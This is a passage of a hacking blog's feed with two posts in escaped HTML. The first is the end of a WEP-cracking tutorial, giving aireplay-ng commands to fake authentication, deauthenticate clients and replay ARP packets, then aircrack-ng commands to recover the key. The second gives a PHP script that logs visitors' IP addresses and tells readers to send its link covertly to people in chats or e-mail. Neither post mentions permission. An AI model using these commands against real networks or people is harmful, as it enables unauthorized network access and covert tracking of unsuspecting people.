margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;-w is the prefix for the capture files, I normally use the ESSID&lt;/li&gt;&lt;/ul&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;That’s all you need to do for a passive attack. Now we’ll speed up the process.&lt;/span&gt;&lt;br /&gt;&lt;h4 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; font-family: &#39;Century Gothic&#39;, sans-serif; font-size: 18px; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;  &lt;/h4&gt;&lt;h4 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; font-family: &#39;Century Gothic&#39;, sans-serif; font-size: 18px; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;   Authenticate with the AP:&lt;/h4&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;One of these will work better than the other depending on your scenario. Choose what works best for you.&lt;/span&gt;&lt;br /&gt;&lt;pre style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; font-family: &#39;Courier New&#39;, monospace; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 10px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;# aireplay-ngÂ -1 0 -e ESSID -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0&lt;/pre&gt;&lt;pre style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; font-family: &#39;Courier New&#39;, monospace; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 10px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;# aireplay-ngÂ -1 6000 -o 1 -q 10 -e ESSID -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0&lt;/pre&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;If neither of those work MAC filtering may be configured and you will need to spoof your MAC to an existing client. Then you can either move on to the next step masquerading while the client is still up, or sent a deauthenticate packet and try the previous again / wait for the client to reauthenticate and send ARP packets.&lt;/span&gt;&lt;br /&gt;&lt;pre style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; font-family: &#39;Courier New&#39;, monospace; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 10px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;# aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0&lt;/pre&gt;&lt;h4 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; font-family: &#39;Century Gothic&#39;, sans-serif; font-size: 18px; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;  &lt;/h4&gt;&lt;h4 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; font-family: &#39;Century Gothic&#39;, sans-serif; font-size: 18px; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;   Inject your packets:&lt;/h4&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;Finally, you’re associated and not getting sent deauthentication packets. As long as you are associated the AP will respond to your packets. If you lose authentication just perform what you had to do in the previous step. Now we’re going to start repeating ARP packets.&lt;/span&gt;&lt;br /&gt;&lt;pre style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; font-family: &#39;Courier New&#39;, monospace; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 10px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;# aireplay-ng -3 -bÂ 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0&lt;/pre&gt;&lt;h4 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; font-family: &#39;Century Gothic&#39;, sans-serif; font-size: 18px; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;  &lt;/h4&gt;&lt;h4 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; font-family: &#39;Century Gothic&#39;, sans-serif; font-size: 18px; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;   Crack your data:&lt;/h4&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;Once you get about 20,000 you can try to see if you can find the key. You can perform this step while still collecting IVs. First we’ll try to crack based on a 64-bit key. Replace ESSID with whatever you put for the -w parameter for airdump previously.&lt;/span&gt;&lt;br /&gt;&lt;pre style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; font-family: &#39;Courier New&#39;, monospace; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 10px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;# aircrack-ng -n 64 ESSID*.cap&lt;/pre&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;If that doesn’t work we’ll try for a 128-bit key.&lt;/span&gt;&lt;br /&gt;&lt;pre style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; border-width: initial; font-family: &#39;Courier New&#39;, monospace; font-size: 12px; line-height: 23px; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 10px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;# aircrack-ng ESSID*.cap&lt;/pre&gt;&lt;h3 style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-color: initial; border-color: initial; border-image: initial; border-style: initial; border-width: initial; clear: both; font-size: 2.8em; font-weight: lighter; line-height: 1em; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 20px; margin-left: 0px; margin-right: 0px; margin-top: 20px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;  &lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Conclusion&lt;/span&gt;&lt;/h3&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;The process to break through WEP can be completly automated and done in a very short period of time. Make sure you secure your network with something more secure. At the time of this article I use WPA2 with a RADIUS backend.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 23px;&quot;&gt;If you are trying this at home and can’t crack it right away don’t get discouraged. It once took me over 2 million IVs to break into my home network. It’s all a matter of luck when it comes down to aircrack-ng step.&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/4643301901324511347/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-crack-wifi-wep-with-packet.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/4643301901324511347'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/4643301901324511347'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-crack-wifi-wep-with-packet.html' title='How To Crack WiFi WEP With Packet Injection'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5102751654897812866.post-7076965404757596559</id><published>2012-03-10T14:53:00.001+05:30</published><updated>2012-03-13T06:45:04.757+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hack"/><category scheme="http://www.blogger.com/atom/ns#" term="IP Address"/><title type='text'>How to get anyone&#39;s IP address</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-6xwmcN_KkJE/T1jOZrK0-yI/AAAAAAAAFLI/pzBi6nAko8U/s1600/Duqu+Trojan+developed+in+unknown+programming+language.jpg&quot; /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Here&#39;s easy trick to find IP addresse of any one ,we can use it to find anyone&#39;s Ip easily while chatting in GTalk, Facebook, Yahoo messenger or anywhere else. You can also use it in a E-mail to find the Ip of the Recieptent.&lt;br /&gt;&lt;br /&gt;Process:&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Create a new notepad file on your desktop and name it &quot;ip.txt&quot;&lt;/li&gt;&lt;li&gt;Now save it.&lt;/li&gt;&lt;li&gt;Now create another text file using notepad and open it.&amp;nbsp;&lt;/li&gt;&lt;li&gt;Copy the Below code from here and paste it there&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace; font-size: x-small;&quot;&gt;$file = &quot;ip.txt&quot;;&lt;/span&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace; font-size: x-small;&quot;&gt;$f=fopen($file, &#39;a&#39;);&lt;/span&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace; font-size: x-small;&quot;&gt;fwrite($f,$_SERVER[&#39;REMOTE_ADDR&#39;].&quot;\n&quot;);&lt;/span&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace; font-size: x-small;&quot;&gt;fclose($f);&lt;/span&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace; font-size: x-small;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Now save this txt file with the name&quot; get.php&quot;&lt;/li&gt;&lt;li&gt;Now upload both the files &quot;get.php&quot; and &quot;ip.txt&quot; to any free web hosting site. eg. 110mb.com or my3gb.com&lt;/li&gt;&lt;li&gt;Now give the link of get.php to anyone .&lt;/li&gt;&lt;li&gt;He will get an error &quot; File Not Found.&quot;&lt;/li&gt;&lt;li&gt;And You got the Ip address !&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;How to view the Stolen Ip Address..???&lt;br /&gt;&lt;br /&gt;Just view the ip.txt file on your uploaded site and you&#39;ll get the ip adress of all the peoples who visited your link.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;&lt;b&gt;And we all know what can be done with just an IP Address. &amp;nbsp;;)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.walkwithgeeks.com/feeds/7076965404757596559/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-get-anyones-ip-address.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/7076965404757596559'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5102751654897812866/posts/default/7076965404757596559'/><link rel='alternate' type='text/html' href='http://www.walkwithgeeks.com/2012/03/how-to-get-anyones-ip-address.html' title='How to get anyone&#39;s IP address'/><author><name>w4r-b0y</name><uri>http://www.blogger.com/profile/05228913152692665909</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-c7Zytb6u_FM/T1kfNc1r9YI/AAAAAAAAAAs/svUCTY6iXqQ/s220/398411_10150458055732544_632347543_8555824_905910441_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-6xwmcN_KkJE/T1jOZrK0-yI/AAAAAAAAFLI/pzBi6nAko8U/s72-c/Duqu+Trojan+developed+in+unknown+programming+language.jpg" height="72" width="72"/><thr:total>0</thr:total></entry></feed>